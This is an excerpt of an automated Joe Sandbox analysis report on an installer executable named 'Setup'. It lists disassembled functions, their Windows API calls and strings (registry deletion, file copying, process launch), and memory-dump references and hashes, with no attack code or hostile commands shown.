Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

